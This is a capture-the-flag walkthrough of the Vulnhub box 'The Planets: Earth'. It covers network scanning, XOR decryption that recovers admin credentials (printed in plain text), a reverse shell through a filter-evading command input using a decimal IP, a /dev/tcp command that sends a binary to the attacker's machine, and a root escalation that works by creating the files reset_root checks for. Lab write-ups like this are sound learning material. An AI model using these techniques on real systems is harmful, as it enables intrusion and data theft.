THE PLANETS
Name: The Planets: Earth Date release: 2 Nov 2021 Author: SirFlash Series: The Planets
Last updated
Difficulty: Easy
Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.
Today marks the last day of my midterms, and after a long break I am continuing with the Vulnhub box The Planets: Earth. I chose this box because its theme is Earth and it is rated as beginner level. With that, let's move on.
PS: this walkthrough assumes the target box and the attacker box are on the same network. In my case I set up a host-only adapter for both machines.
As usual, before doing anything else we gather as much information about the target as possible. Here I use nmap scanning.
First, scan the network to discover the Earth machine:
sudo nmap -sn <rangeIP>/24
After confirming the target machine's IP, scan it for open ports.
As we can see, the HTTP and HTTPS ports are open. Notice that port 80 returns HTTP code 400 (Bad Request).
Another hint: the scan output also shows the DNS names for the Earth machine.
Add those DNS names to our hosts file:
sudo nano /etc/hosts
Open the browser with each of the two DNS names; both show the same landing page. Next, let's test robots.txt.
Hmm, what does that mean? Let's see what it is about.
Some juicy information here. Overall, these notes describe the encryption used by the secure messaging system. They also mention the admin username, and the most important part is the testdata.txt section. Using this information, we can recover the secret message.
We know the system uses XOR, so let's decrypt the messages with the key given. Where do we get the input?
This means the earlier test message is the one at the bottom. Decrypt it and we get this.
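As an added example (not the writeup's own code, and using constructed placeholder values rather than the box's real key file or messages), this shows the XOR scheme the notes describe: decrypting the hex-encoded message with the key file, and why exposing that key file, or any known piece of plaintext, gives the whole scheme away.

```python
# Added example (not from the writeup): XOR "encryption" with a reused key,
# as used by the box's messaging system, and why it gives no confidentiality.
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key. The same call encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def decrypt_hex_message(hex_ct: str, key: bytes) -> str:
    """Decode the hex ciphertext as shown on the site and XOR it with the key file."""
    return xor_bytes(bytes.fromhex(hex_ct), key).decode("utf-8", errors="replace")


def recover_key(hex_ct: str, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: ciphertext XOR plaintext yields the key bytes for that span."""
    ct = bytes.fromhex(hex_ct)
    return xor_bytes(ct[: len(known_plaintext)], known_plaintext)


# Constructed sample values (placeholders, NOT the box's real key or messages).
KEY_FILE = b"sample key text taken from a placeholder testdata file "
SECRET = b"admin password is: placeholder-secret-1234"
CIPHERTEXT_HEX = xor_bytes(SECRET, KEY_FILE).hex()

if __name__ == "__main__":
    # With the key file in hand, the "encrypted" message reads back directly.
    print(decrypt_hex_message(CIPHERTEXT_HEX, KEY_FILE))
    # Even without the key file, guessing a prefix of the plaintext leaks the
    # key bytes that covered it, which then decrypt every message reusing them.
    print(recover_key(CIPHERTEXT_HEX, b"admin password is"))
```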
This could be something useful. Yes, admin credentials:
terra: earthclimatechangebad4humans
Wait wait… CLI??? Let's test it with a simple command.
What… there is no filter on this… Hmm… let's put our payload into it. Before that, fire up our listener.
Oh no, the machine filters the dot [.]. After some research, I found that the IP can be written in decimal form instead.
Yeah, we're in.
This machine is quite interesting, since the permissions are only for root.
So we can skip the user part. (I didn't notice there were two flags, since the user earth doesn't have any files.)
Let's find SUID binaries owned by root:
find / -perm -u=s -type f 2>/dev/null
reset_root?? Let's check what it does. I pull the binary over to my local machine.
Open a new listener that redirects its output to a file.
On the Earth machine:
Cat the file to our machine's IP and port:
cat /usr/bin/reset_root > /dev/tcp/machineIP/8787
On our machine:
Change the permission to 777 (why? because we need permission to execute it).
Use ltrace to trace the ELF binary's library calls.
So reset_root checks whether three files are present before it triggers the root reset. We can bypass this by manually creating those three files on the Earth machine.
On the Earth machine:
touch <filename>
After creating all three files,
let's try to trigger the root reset.
We successfully trigger the root password reset and it gives us a recovery password.
Now we can switch to the root user with the password given.
Poof... we're in as root.
Thank you for reading. This writeup is meant to help me remember the steps in future and for reference. I would say this machine is easy, but not too easy.
Bypassing a filtered [.] in the CLI using a decimal IP.
XOR encryption.
Bypassing a file-existence check by creating the files.